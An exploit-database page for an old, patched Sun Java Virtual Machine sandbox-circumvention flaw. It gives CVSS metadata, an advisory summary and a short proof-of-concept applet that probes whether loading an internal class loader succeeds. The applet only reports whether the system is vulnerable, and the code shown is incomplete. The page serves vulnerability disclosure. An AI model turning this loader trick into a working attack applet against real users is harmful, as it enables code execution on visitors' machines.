header-logo
Suggest Exploit
vendor:
Java Runtime Environment
by:
SecurityFocus
7.5
CVSS
HIGH
Circumvention of the Java Security Model
264
CWE
Product Name: Java Runtime Environment
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:sun:java_runtime_environment
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All
2002

Sun Java Virtual Machine Vulnerability

A vulnerability has been identified in the Sun Java Virtual Machine packaged with JRE and SDK. This issue results in the circumvention of the Java Security Model, and can permit an attacker to execute arbitrary code on vulnerable hosts. An attacker can exploit this issue by creating a malicious applet and hosting it on a malicious web server. When a vulnerable user visits the malicious web server, the malicious applet will be executed on the user's system.

Mitigation:

Users should avoid visiting untrusted websites and should not accept or execute files from untrusted or unknown sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8879/info

A vulnerability has been identified in the Sun Java Virtual Machine packaged with JRE and SDK. This issue results in the circumvention of the Java Security Model, and can permit an attacker to execute arbitrary code on vulnerable hosts. 

import java.applet.Applet;
import java.awt.Graphics;
import java.lang.Class;
import java.security.AccessControlException;

public class Simple extends Applet {

StringBuffer buffer;

public void init() {
buffer = new StringBuffer();
}

public void start() {
ClassLoader cl = this.getClass().getClassLoader();
try {
Class cla =
cl.loadClass("sun/applet/AppletClassLoader"); // Note the slashes
addItem("No exception in loadClass. Vulnerable!");
} catch (ClassNotFoundException e) {
addItem("ClassNotFoundException in loadClass - " + e);
} catch (AccessControlException e) {
addItem("AccessControlException in loadClass - Not
Vulnerable!");
}

}

Navigation

Suggest Exploit

Services By CQR